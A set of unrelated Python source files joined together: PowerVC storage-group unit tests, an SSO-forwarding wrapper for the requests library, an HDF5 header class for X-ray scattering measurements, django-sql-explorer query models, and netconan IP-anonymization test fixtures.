self.assertEqual([volume.id for volume in scg_accessible_volumes],
["ab41ee79-0f84-4f0d-976e-0aa122c8b89d"])
def test_get_scg_accessible_volumes_1(self):
scg_accessible_volumes = \
self.utils.get_scg_accessible_volumes(
"f4b541cb")
# Shoud return the volume which in the accessible
# storage templates
self.assertEqual(scg_accessible_volumes[0].id,
"ab41ee79-0f84-4f0d-976e-0aa122c8b89d")
def test_get_multi_scg_accessible_volumes_2(self):
scg_accessible_volumes = \
self.utils.get_multi_scg_accessible_volumes(
scg_uuid_list=None,
scg_name_list=self.scg_name_list)
# Shoud return the volume which in the accessible
# storage templates
self.assertEqual([volume.id for volume in scg_accessible_volumes],
["ab41ee79-0f84-4f0d-976e-0aa122c8b89d"])
def test_get_scg_accessible_volumes_2(self):
scg_accessible_volumes = \
self.utils.get_scg_accessible_volumes(
scgName="Auto-SCG for Registered SAN")
# Shoud return the volume which in the accessible
# storage templates
self.assertEqual(scg_accessible_volumes[0].id,
"ab41ee79-0f84-4f0d-976e-0aa122c8b89d")
def test_get_scg_cache(self):
new_scg = self.utils.get_scg_cache(self.utils._novaclient)
self.assertNotEqual(new_scg, self.utils.scg_cache)
def test_get_all_scgs(self):
scg_list = self.utils.get_all_scgs()
self.assertEqual([scg.id for scg in scg_list],
self.scg_id_list)
def test_get_our_scg_list(self):
from powervc.common import config as cg
cg.CONF['powervc'].storage_connectivity_group = self.scg_name_list
scg_list = self.utils.get_our_scg_list()
self.assertIsNotNone(scg_list)
def test_validate_scgs(self):
from powervc.common import config as cg
cg.CONF['powervc'].storage_connectivity_group = self.scg_name_list
ret = self.utils.validate_scgs()
self.assertTrue(ret)
def test_get_scg_by_scgName_1(self):
scg = self.utils.get_scg_by_scgName("Auto-SCG for Registered SAN")
self.assertIsNotNone(scg)
def test_get_scg_id_by_scgName_1(self):
scg_id = self.utils.\
get_scg_id_by_scgName("Auto-SCG for Registered SAN")
self.assertEqual(scg_id, "f4b541cb")
def test_get_scg_id_by_scgName_2(self):
scg_id = self.utils.\
get_scg_id_by_scgName("Auto-SCG for Registered SAN")
self.assertIsNotNone(scg_id)
def test_get_scg_id_by_scgName_3(self):
scg_id = self.utils.\
get_scg_id_by_scgName("NON-Auto-SCG for Registered SAN")
self.assertEqual(scg_id, "")
def test_get_scg_accessible_storage_servers_1(self):
servers = self.utils.get_scg_accessible_servers()
self.assertIsNotNone(servers)
def test_get_scg_accessible_storage_servers_2(self):
servers = self.utils.get_scg_accessible_servers(
scgName="Auto-SCG for Registered SAN")
self.assertIsNotNone(servers)
def compare_to_expected(self, expected, hyper):
for key, value in expected.items():
self.assertEqual(getattr(hyper, key), value)
def test_get_image_scgs(self):
self.utils._novaclient = mock.MagicMock()
self.utils.get_image_scgs('imageUUID')
self.utils._novaclient.storage_connectivity_groups.\
list_for_image.assert_called_with('imageUUID')
scgs = self.utils.get_image_scgs(None)
self.assertEqual(scgs, [])
def test_get_scg_image_ids(self):
self.utils._novaclient = mock.MagicMock()
self.utils.get_scg_image_ids('scgUUID')
self.utils._novaclient.scg_images.\
list_ids.assert_called_with('scgUUID')
imgs = self.utils.get_image_scgs(None)
self.assertEqual(imgs, [])
def test_get_local_staging_project_id(self):
class Tenant(object):
def __init__(self, name, tid):
self.name = name
self.id = tid
self.utils._localkeystoneclient = mock.MagicMock()
self.utils._localkeystoneclient.tenants.list.return_value = \
[Tenant('fake_tenant_name1', 1), Tenant('fake_tenant_name2', 2)]
from powervc.common import config as cg
cg.CONF.powervc.staging_project_name = 'fake_tenant_name1'
ret_id = self.utils.get_local_staging_project_id()
self.assertEqual(ret_id, 1)
cg.CONF.powervc.staging_project_name = 'no_tenant_name'
from powervc.common.exception import StagingProjectNotFound
self.assertRaises(StagingProjectNotFound,
self.utils.get_local_staging_project_id)
def test_get_local_staging_user_id(self):
class User(object):
def __init__(self, name, tid):
self.name = name
self.id = tid
self.utils._localkeystoneclient = mock.MagicMock()
self.utils._localkeystoneclient.users.list.return_value = \
[User('fake_user_name1', 1), User('fake_user_name2', 2)]
from powervc.common import config as cg
cg.CONF.powervc.staging_user = 'fake_user_name1'
ret_id = self.utils.get_local_staging_user_id()
self.assertEqual(ret_id, 1)
cg.CONF.powervc.staging_user = 'no_user_name'
from powervc.common.exception import StagingUserNotFound
self.assertRaises(StagingUserNotFound,
self.utils.get_local_staging_user_id)
def test_multi_thread_scgcache(self):
# Launch one thousand one tasks to test the scg cache.
class FakeScg(object):
def __init__(self, scgid, name):
self.id = scgid
self.display_name = name
def fake_get_resource():
eventlet.greenthread.sleep(1)
data1 = {}
for i in range(1001):
data1[FakeScg(str(i), 'scg' + str(i))] = 'scg' + str(i)
return data1
self.utils.scg_cache._get_resources = fake_get_resource
def cache_task(key):
scg1 = self.utils.scg_cache.by_id(key)
self.assertEqual('scg' + key, scg1.display_name)
scg2 = self.utils.scg_cache.by_name('scg' + key)
self.assertEqual(key, scg2.id)
print eventlet.greenthread.getcurrent
pool = eventlet.GreenPool()
pool.imap(cache_task, [str(i) for i in xrange(1001)])
class FakeDriver(object):
def set_data(self, data):
self._data = data
def cache_volume_data(self):
return self._data
class VolumeCacheTest(testtools.TestCase):
def setUp(self):
super(VolumeCacheTest, self).setUp()
self._driver = FakeDriver()
def tearDown(self):
super(VolumeCacheTest, self).tearDown()
def test_get_resources(self):
self._driver.set_data(None)
volume_cache = VolumeCache(self._driver)
self.assertEqual(None, volume_cache._get_resources())
data1 = {'p000': 'l000'}
self._driver.set_data(data1)
volume_cache = VolumeCache(self._driver)
self.assertEqual(data1, volume_cache._get_resources())
def test_get_by_id(self):
data1 = {'p000': 'l000'}
self._driver.set_data(data1)
volume_cache = VolumeCache(self._driver)
self.assertEqual('l000', volume_cache.get_by_id('p000'))
self.assertIsNone(volume_cache.get_by_id('p0001'))
self.assertNotEquals('l001', volume_cache.get_by_id('p000'))
def test_set_by_id(self):
data1 = {'p000': 'l000'}
self._driver.set_data(data1)
volume_cache = VolumeCache(self._driver, 10000000)
self.assertEqual('l000', volume_cache.get_by_id('p000'))
volume_cache.set_by_id('p001', 'l001')
self.assertEqual('l001', volume_cache.get_by_id('p001'))
self.assertEqual('l000', volume_cache.get_by_id('p000'))
def test_multi_thread(self):
# Launch one thousand one tasks to test the cache.
data1 = {}
for i in range(1001):
data1[str(i)] = 'value' + str(i)
self._driver.set_data(data1)
volume_cache = VolumeCache(self._driver, 10000000)
def cache_task(key):
str1 = volume_cache.get_by_id(key)
self.assertEqual('value' + key, str1)
volume_cache.set_by_id('country', 'china')
str2 = volume_cache.get_by_id('country')
self.assertEqual('china', str2)
return "%s-%s, %s" % (key, str1, str2)
pool = eventlet.GreenPool()
i = 0
for rtn in pool.imap(cache_task, data1.keys()):
print "Got return from ", str(i), ': ', rtn
i += 1
|
|
import requests
import os
import six
session_key_header = "X_SESSION_KEY"
http_session_key_header = "HTTP_{}".format(session_key_header)
sso_cookie_name = os.environ.get(
"SSO_COOKIE_NAME") or "_dpaw_wa_gov_au_sessionid"
debug = (os.environ.get("DEBUG_SSO") or "false").lower() in [
"true", "yes", "t", "y", "on"]
if debug:
import json as json_lib
request_seq = 0
def _set_session_key(user_request, kwargs):
"""
Get the session key from user request for sso
if not found, return None
"""
if not user_request:
return
session_key = None
request_name = user_request.__module__ + "." + user_request.__class__.__name__
try:
if request_name[0:7] == "bottle.":
session_key = user_request.get_header(
session_key_header, user_request.get_header(
http_session_key_header, None))
elif request_name[0:7] == "django.":
session_key = user_request.META.get(
http_session_key_header, user_request.META.get(
session_key_header, None))
else:
session_key = user_request.META.get(
http_session_key_header, user_request.META.get(
session_key_header, None))
except:
pass
if not session_key:
# Try to use the current session id
try:
session_key = user_request.session.session_key
except:
pass
if session_key:
cookies = kwargs.get("cookies", {})
cookies[sso_cookie_name] = session_key
kwargs["cookies"] = cookies
return
log_head_format = """{}-{}: {}
server-side request: {} {}
header:
{}
"""
def log(user_request, url, method, data=None, json=None, kwargs=None):
global request_seq
request_seq += 1
try:
request_path = user_request.path
except:
request_path = ""
log_msg = log_head_format.format(os.getpid(), request_seq, request_path,
url, method,
("\n" + ' ' * 12).join(["{}={}".format(k, v) for k, v in (kwargs or {}).iteritems()]))
if data:
log_msg += "{}body(data): {}\n".format(' ' * 8, str(data))
if json:
json_out = six.StringIO()
try:
json_lib.dump(json, json_out, indent=4)
json_str = "\n".join(
[" " * 12 + line for line in json_out.getvalue().split("\n")])
finally:
json_out.close()
log_msg += "{}body(json):\n{}\n".format(' ' * 8, json_str)
print(log_msg)
def options(user_request, url, **kwargs):
""" A wrapper of requests.options.
This method will automatically add user's session key as the cookie to enable sso
Sends a OPTIONS request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "OPTIONS", kwargs=kwargs)
return requests.options(url, **kwargs)
def head(user_request, url, **kwargs):
""" A wrapper of requests.head.
This method will automatically add user's session key as the cookie to enable sso
Sends a HEAD request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "HEAD", kwargs=kwargs)
return requests.head(url, **kwargs)
def get(user_request, url, **kwargs):
""" A wrapper of requests.get.
This method will automatically add user's session key as the cookie to enable sso
Sends a GET request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "GET", kwargs=kwargs)
return requests.get(url, **kwargs)
def post(user_request, url, data=None, json=None, **kwargs):
""" A wrapper of requests.post.
This method will automatically add user's session key as the cookie to enable sso
Sends a POST request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param json: (optional) json data to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "POST", data=data, json=json, kwargs=kwargs)
return requests.post(url, data, json, **kwargs)
def put(user_request, url, data=None, **kwargs):
""" A wrapper of requests.put.
This method will automatically add user's session key as the cookie to enable sso
Sends a PUT request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "PUT", data=data, kwargs=kwargs)
return requests.put(url, data, **kwargs)
def patch(user_request, url, data=None, **kwargs):
""" A wrapper of requests.patch.
This method will automatically add user's session key as the cookie to enable sso
Sends a PATCH request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "PATCH", data=data, kwargs=kwargs)
return requests.patch(url, data, **kwargs)
def delete(user_request, url, **kwargs):
""" A wrapper of requests.delete.
This method will automatically add user's session key as the cookie to enable sso
Sends a DELETE request. Returns :class:`Response` object.
:param user_request: The http request contains the authentication key and is triggered by user.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
"""
_set_session_key(user_request, kwargs)
if debug:
log(user_request, url, "DELETE", kwargs=kwargs)
return requests.delete(url, **kwargs)
|
|
import datetime
from typing import Optional, Union
import dateutil.parser
import h5py
import numpy as np
import scipy.constants
from ... import classes2
from ...misc.errorvalue import ErrorValue
# noinspection PyMethodOverriding
class Header(classes2.Header):
_data = None
@classmethod
def new_from_file(cls, filename: str, samplename: str, dist: float):
with h5py.File(filename) as f:
dist = sorted([d for d in f['Samples'][samplename].keys()], key=lambda d: abs(float(d) - dist))[0]
return cls.new_from_group(f['Samples'][samplename][dist])
@classmethod
def new_from_group(cls, grp: h5py.Group):
self = cls()
self._data = {'fsn': 0}
for a in grp.attrs:
self._data[a] = grp.attrs[a]
for a in list(self._data.keys()):
if isinstance(self._data[a], (float, np.number)) and (not a.endswith('.err')) and (
a + '.err' not in self._data):
self._data[a + '.err'] = 0.0
return self
@property
def title(self) -> str:
return self._data['title']
@title.setter
def title(self, value: str):
self._data['title'] = value
@property
def fsn(self) -> int:
return self._data['fsn']
@fsn.setter
def fsn(self, value: int):
self._data['fsn'] = value
@property
def energy(self) -> ErrorValue:
"""X-ray energy"""
return (ErrorValue(*(scipy.constants.physical_constants['speed of light in vacuum'][0::2])) *
ErrorValue(*(scipy.constants.physical_constants['Planck constant in eV s'][0::2])) /
scipy.constants.nano /
self.wavelength)
@energy.setter
def energy(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self.wavelength = (ErrorValue(*(scipy.constants.physical_constants['speed of light in vacuum'][0::2])) *
ErrorValue(*(scipy.constants.physical_constants['Planck constant in eV s'][0::2])) /
scipy.constants.nano /
value)
@property
def wavelength(self) -> ErrorValue:
"""X-ray wavelength"""
return ErrorValue(self._data["wavelength"], self._data["wavelength.err"])
@wavelength.setter
def wavelength(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['wavelength'] = value.val
self._data['wavelength.err'] = value.err
@property
def distance(self) -> ErrorValue:
"""Sample-to-detector distance"""
return ErrorValue(self._data['distance'], self._data['distance.err'])
@distance.setter
def distance(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['distance'] = value.val
self._data['distance.err'] = value.err
@property
def temperature(self) -> Optional[ErrorValue]:
"""Sample temperature"""
try:
return ErrorValue(self._data['temperature'], self._data['temperature.err'])
except KeyError:
return None
@temperature.setter
def temperature(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['temperature'] = value.val
self._data['temperature.err'] = value.err
@property
def beamcenterx(self) -> ErrorValue:
"""X (column) coordinate of the beam center, pixel units, 0-based."""
return ErrorValue(self._data['beamcenterx'], self._data['beamcenterx.err'])
@beamcenterx.setter
def beamcenterx(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['beamcenterx'] = value.val
self._data['beamcenterx.err'] = value.err
@property
def beamcentery(self) -> ErrorValue:
"""Y (row) coordinate of the beam center, pixel units, 0-based."""
return ErrorValue(self._data['beamcentery'], self._data['beamcentery.err'])
@beamcentery.setter
def beamcentery(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['beamcentery'] = value.val
self._data['beamcentery.err'] = value.err
@property
def pixelsizex(self) -> ErrorValue:
"""X (column) size of a pixel, in mm units"""
return ErrorValue(self._data['pixelsizex'], self._data['pixelsizex.err'])
@pixelsizex.setter
def pixelsizex(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['pixelsizex'] = value.val
self._data['pixelsizex.err'] = value.err
@property
def pixelsizey(self) -> ErrorValue:
"""Y (row) size of a pixel, in mm units"""
return ErrorValue(self._data['pixelsizey'], self._data['pixelsizey.err'])
@pixelsizey.setter
def pixelsizey(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['pixelsizey'] = value.val
self._data['pixelsizey.err'] = value.err
@property
def exposuretime(self) -> ErrorValue:
"""Exposure time in seconds"""
return ErrorValue(self._data['exposuretime'], self._data['exposuretime.err'])
@exposuretime.setter
def exposuretime(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['exposuretime'] = value.val
self._data['exposuretime.err'] = value.val
@property
def date(self) -> datetime.datetime:
"""Date of the experiment (start of exposure)"""
return dateutil.parser.parse(self._data['date'])
@date.setter
def date(self, value: datetime.datetime):
self._data['date'] = str(value)
@property
def startdate(self) -> datetime.datetime:
return dateutil.parser.parse(self._data['startdate'])
@startdate.setter
def startdate(self, value: datetime.datetime):
self._data['startdate'] = str(value)
@property
def enddate(self) -> datetime.datetime:
return dateutil.parser.parse(self._data['enddate'])
@enddate.setter
def enddate(self, value: datetime.datetime):
self._data['enddate'] = str(value)
@property
def maskname(self) -> Optional[str]:
"""Name of the mask matrix file."""
try:
maskid = self._data['maskname']
if not maskid.endswith('.mat'):
maskid = maskid + '.mat'
return maskid
except KeyError:
return None
@maskname.setter
def maskname(self, value: str):
self._data['maskname'] = value
@property
def transmission(self) -> ErrorValue:
"""Sample transmission."""
return ErrorValue(self._data['transmission'], self._data['transmission.err'])
@transmission.setter
def transmission(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['transmission'] = value.val
self._data['transmission.err'] = value.err
@property
def vacuum(self) -> ErrorValue:
"""Vacuum pressure around the sample"""
return ErrorValue(self._data['vacuum'], self._data['vacuum.err'])
@vacuum.setter
def vacuum(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['vacuum'] = value.val
self._data['vacuum.err'] = value.err
@property
def flux(self) -> ErrorValue:
"""X-ray flux in photons/sec."""
try:
return ErrorValue(self._data['flux'], self._data['flux.err'])
except KeyError:
return 1 / self.pixelsizex / self.pixelsizey / ErrorValue(self._data['absintfactor'],
self._data['absintfactor.err'])
@flux.setter
def flux(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['flux'] = value.val
self._data['flux.err'] = value.err
@property
def thickness(self) -> ErrorValue:
"""Sample thickness in cm"""
return ErrorValue(self._data['thickness'], self._data['thickness.err'])
@thickness.setter
def thickness(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['thickness'] = value.val
self._data['thickness.err'] = value.err
@property
def distancedecrease(self) -> ErrorValue:
"""Distance by which the sample is nearer to the detector than the
distance calibration sample"""
return ErrorValue(self._data['distancedecrease'], self._data['distancedecrease.err'])
@distancedecrease.setter
def distancedecrease(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['distancedecrease'] = value.val
self._data['distancedecrease.err'] = value.err
@property
def samplex(self) -> ErrorValue:
"""Horizontal sample position"""
return ErrorValue(self._data['samplex'], self._data['samplex.err'])
@samplex.setter
def samplex(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['samplex'] = value.val
self._data['samplex.err'] = value.err
@property
def sampley(self) -> ErrorValue:
"""Vertical sample position"""
return ErrorValue(self._data['sampley'], self._data['sampley.err'])
@sampley.setter
def sampley(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['sampley'] = value.val
self._data['sampley.err'] = value.err
def motorposition(self, motorname: str) -> float:
"""Position of the motor `motorname`."""
return self._data[motorname]
@property
def username(self) -> str:
"""Name of the instrument operator"""
return self._data['username']
@username.setter
def username(self, value: str):
self._data['username'] = value
@property
def project(self) -> str:
"""Project name"""
return self._data['project']
@project.setter
def project(self, value: str):
self._data['project'] = value
@property
def fsn_emptybeam(self) -> int:
"""File sequence number of the empty beam measurement"""
return self._data['fsn_emptybeam']
@fsn_emptybeam.setter
def fsn_emptybeam(self, value: int):
self._data['fsn_emptybeam'] = value
@property
def fsn_absintref(self) -> int:
"""File sequence number of the absolute intensity reference measurement
"""
return self._data['fsn_absintref']
@fsn_absintref.setter
def fsn_absintref(self, value: int):
self._data['fsn_absintref'] = value
@property
def absintfactor(self) -> ErrorValue:
"""Absolute intensity calibration factor"""
return ErrorValue(self._data['absintfactor'], self._data['absintfactor.err'])
@absintfactor.setter
def absintfactor(self, value: Union[ErrorValue, float]):
if not isinstance(value, ErrorValue):
value = ErrorValue(value, 0)
self._data['absintfactor'] = value.val
self._data['absintfactor.err'] = value.err
@property
def samplex_motor(self) -> Optional[float]:
"""Sample X position, motor reading"""
try:
return self._data['samplex_motor']
except KeyError:
return None
@samplex_motor.setter
def samplex_motor(self, value: float):
self._data['samplex_motor'] = value
@property
def sampley_motor(self) -> Optional[float]:
"""Sample Y position, motor reading"""
try:
return self._data['sampley_motor']
except KeyError:
return None
@sampley_motor.setter
def sampley_motor(self, value: float):
self._data['sampley_motor'] = value
@property
def sample_category(self) -> str:
"""Sample category"""
try:
return self._data['sample_category']
except KeyError:
return 'sample'
@sample_category.setter
def sample_category(self, newvalue: str):
self._data['sample_category'] = newvalue
|
|
from explorer.utils import passes_blacklist, swap_params, extract_params, shared_dict_update, get_connection
from django.db import models, DatabaseError
from time import time
from django.core.urlresolvers import reverse
from django.conf import settings
import app_settings
import logging
import six
MSG_FAILED_BLACKLIST = "Query failed the SQL blacklist."
logger = logging.getLogger(__name__)
class Query(models.Model):
title = models.CharField(max_length=255)
sql = models.TextField()
description = models.TextField(null=True, blank=True)
created_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
last_run_date = models.DateTimeField(auto_now=True)
cache_table = models.CharField(max_length=40, null=True, blank=True)
database = models.CharField(max_length=40, null=True, blank=True)
schedule = models.CharField(max_length=40, null=True, blank=True)
last_auto_run_date = models.DateTimeField(null=True,blank=True)
last_auto_run_result = models.TextField(null=True,blank=True, max_length=10000)
autorun_state= models.IntegerField(default=0)
post_cache_sql = models.TextField(null=True,blank=True, max_length=10000)
groups = models.ManyToManyField("auth.group")
def __init__(self, *args, **kwargs):
self.params = kwargs.get('params')
kwargs.pop('params', None)
super(Query, self).__init__(*args, **kwargs)
class Meta:
ordering = ['title']
verbose_name_plural = 'Queries'
permissions = (
('query_view', "Can view queries"),
('query_view_any', "Can view any queries"),
)
def __unicode__(self):
return six.text_type(self.title)
def passes_blacklist(self):
return passes_blacklist(self.final_sql())
def final_sql(self):
return swap_params(self.sql, self.params)
def try_execute(self):
"""
A lightweight version of .execute to just check the validity of the SQL.
Skips the processing associated with QueryResult.
"""
QueryResult(self.final_sql(), self.database)
def execute(self):
ret = QueryResult(self.final_sql(), self.database)
ret.process()
return ret
def execute_cache(self):
"""
A lightweight version of .execute to just check the validity of the SQL.
Skips the processing associated with QueryResult.
"""
if not self.cache_table:
return
sql = "drop table if exists %(table)s; create table %(table)s as %(sql)s" % {
"table": self.cache_table,
"sql": self.sql
}
t = time()
QueryResult(sql, self.database)
if self.post_cache_sql:
QueryResult(self.post_cache_sql, self.database)
t = time() - t
sql = "select %(t)f as rebuild_time, count(*) as row_count from %(table)s" % {
"table": self.cache_table,
"t": t
}
ret = QueryResult(sql, self.database)
ret.process()
return ret
def available_params(self):
"""
Merge parameter values into a dictionary of available parameters
:param param_values: A dictionary of Query param values.
:return: A merged dictionary of parameter names and values. Values of non-existent parameters are removed.
"""
p = extract_params(self.sql)
if self.params:
shared_dict_update(p, self.params)
return p
def get_absolute_url(self):
return reverse("query_detail", kwargs={'query_id': self.id})
def log(self, user):
log_entry = QueryLog(sql=self.sql, query_id=self.id, run_by_user=user, is_playground=not bool(self.id), database=self.database)
log_entry.save()
@property
def shared(self):
return self.id in set(sum(app_settings.EXPLORER_GET_USER_QUERY_VIEWS().values(), []))
class QueryLog(models.Model):
sql = models.TextField()
database = models.TextField()
query = models.ForeignKey(Query, null=True, blank=True, on_delete=models.SET_NULL)
is_playground = models.BooleanField(default=False)
run_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
run_at = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-run_at']
class QueryResult(object):
def __init__(self, sql, database = None):
self.sql = sql
self.database = database
cursor, duration = self.execute_query()
self._description = cursor.description or []
self._data = [list(r) for r in cursor.fetchall()]
self.duration = duration
cursor.close()
self._headers = self._get_headers()
self._summary = {}
@property
def data(self):
return self._data or []
@property
def headers(self):
return self._headers or []
def _get_headers(self):
return [ColumnHeader(d[0]) for d in self._description] if self._description else [ColumnHeader('--')]
def _get_numerics(self):
conn = get_connection(self.database)
if hasattr(conn.Database, "NUMBER"):
return [ix for ix, c in enumerate(self._description) if hasattr(c, 'type_code') and c.type_code in conn.Database.NUMBER.values]
elif self.data:
d = self.data[0]
return [ix for ix, _ in enumerate(self._description) if not isinstance(d[ix], six.string_types) and six.text_type(d[ix]).isnumeric()]
return []
def _get_unicodes(self):
if len(self.data):
return [ix for ix, c in enumerate(self.data[0]) if type(c) is six.text_type]
return []
def _get_transforms(self):
transforms = dict(app_settings.EXPLORER_TRANSFORMS)
return [(ix, transforms[str(h)]) for ix, h in enumerate(self.headers) if str(h) in transforms.keys()]
def column(self, ix):
return [r[ix] for r in self.data]
def process(self):
start_time = time()
self.process_columns()
self.process_rows()
logger.info("Explorer Query Processing took in %sms." % ((time() - start_time) * 1000))
def process_columns(self):
for ix in self._get_numerics():
self.headers[ix].add_summary(self.column(ix))
def process_rows(self):
unicodes = self._get_unicodes()
transforms = self._get_transforms()
for r in self.data:
for u in unicodes:
r[u] = r[u].encode('utf-8') if r[u] is not None else r[u]
for ix, t in transforms:
r[ix] = t.format(str(r[ix]))
def execute_query(self):
conn = get_connection(self.database)
cursor = conn.cursor()
start_time = time()
try:
cursor.execute(self.sql)
except DatabaseError as e:
cursor.close()
raise e
return cursor, ((time() - start_time) * 1000)
class ColumnHeader(object):
def __init__(self, title):
self.title = title
self.summary = None
def add_summary(self, column):
self.summary = ColumnSummary(self, column)
def __unicode__(self):
return self.title
def __str__(self):
return self.title
class ColumnStat(object):
def __init__(self, label, statfn, precision=2, handles_null=False):
self.label = label
self.statfn = statfn
self.precision = precision
self.handles_null = handles_null
def __call__(self, coldata):
self.value = round(float(self.statfn(coldata)), self.precision) if coldata else 0
def __unicode__(self):
return self.label
def foo(self):
return "foobar"
class ColumnSummary(object):
def __init__(self, header, col):
self._header = header
self._stats = [
ColumnStat("Sum", sum),
ColumnStat("Avg", lambda x: float(sum(x)) / float(len(x))),
ColumnStat("Min", min),
ColumnStat("Max", max),
ColumnStat("NUL", lambda x: int(sum(map(lambda y: 1 if y is None else 0, x))), 0, True)
]
without_nulls = list(map(lambda x: 0 if x is None else x, col))
for stat in self._stats:
stat(col) if stat.handles_null else stat(without_nulls)
@property
def stats(self):
# dict comprehensions are not supported in Python 2.6, so do this instead
return dict((c.label, c.value) for c in self._stats)
def __str__(self):
return str(self._header)
|
|
"""Test anonymization of IP addresses and related functions."""
# Copyright 2018 Intentionet
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import ipaddress
import re
import pytest
from netconan.ip_anonymization import IpAnonymizer, IpV6Anonymizer, anonymize_ip_addr
ip_v4_classes = [
"0.0.0.0/1", # Class A
"128.0.0.0/2", # Class B
"192.0.0.0/3", # Class C
"224.0.0.0/4", # Class D (implies class E)
]
ip_v4_list = [
("12.13.14.15"),
("237.73.212.5"),
("123.45.67.89"),
("92.210.0.255"),
("128.7.55.12"),
("223.123.21.99"),
("193.99.99.99"),
("225.99.99.99"),
("241.99.99.99"),
("249.99.99.99"),
("254.254.254.254"),
("009.010.011.012"),
("1.2.3.0000014"),
]
ip_v6_list = [
("1234::5678"),
("::1"),
("1::"),
("1::1"),
("2001:db8:85a3:7:8:8a2e:370:7334"),
("2001:db8:a0b:12f0::1"),
("ffff:ffff::ffff:ffff"),
("a:b:c:d:e:f:1:2"),
("aAaA:bBbB:cCcC:dDdD:eEeE:fFfF:1010:2929"),
("ffff:eeee:dddd:cccc:bbbb:AaAa:9999:8888"),
]
# Private-use blocks defined at https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml
# Tuples consist of: start of block, end of block, block subnet
private_blocks = [
("10.0.0.0", "10.255.255.255", "10.0.0.0/8"),
("172.16.0.0", "172.31.255.255", "172.16.0.0/12"),
("192.168.0.0", "192.168.255.255", "192.168.0.0/16"),
]
SALT = "saltForTest"
@pytest.fixture(scope="module")
def anonymizer_v4():
"""Most tests in this module use a single IPv4 anonymizer."""
return IpAnonymizer(SALT)
@pytest.fixture(scope="module")
def anonymizer_v4_preserving_host_bits():
"""IPv4 anonymizer which also preserves some host bits."""
return IpAnonymizer(SALT, preserve_suffix=8)
@pytest.fixture(scope="module")
def anonymizer_v6():
"""All tests in this module use a single IPv6 anonymizer."""
return IpV6Anonymizer(SALT)
@pytest.fixture(scope="module")
def anonymizer(request):
"""Create a generic fixture for different types of anonymizers."""
if request.param == "v4":
return IpAnonymizer(SALT)
elif request.param == "v6":
return IpV6Anonymizer(SALT)
elif request.param == "flipv4":
return IpAnonymizer(SALT, salter=lambda a, b: 1)
else:
raise ValueError("Invalid anonymizer type {}".format(request.param))
@pytest.fixture(scope="module")
def flip_anonymizer_v4():
"""Create an anonymizer that flips every bit except for class bits."""
# Don't preserve private blocks, because that reduces the number of bits flipped
return IpAnonymizer(SALT, preserve_prefixes=ip_v4_classes, salter=lambda a, b: 1)
def anonymize_line_general(anonymizer, line, ip_addrs):
"""Test IP address removal from config lines."""
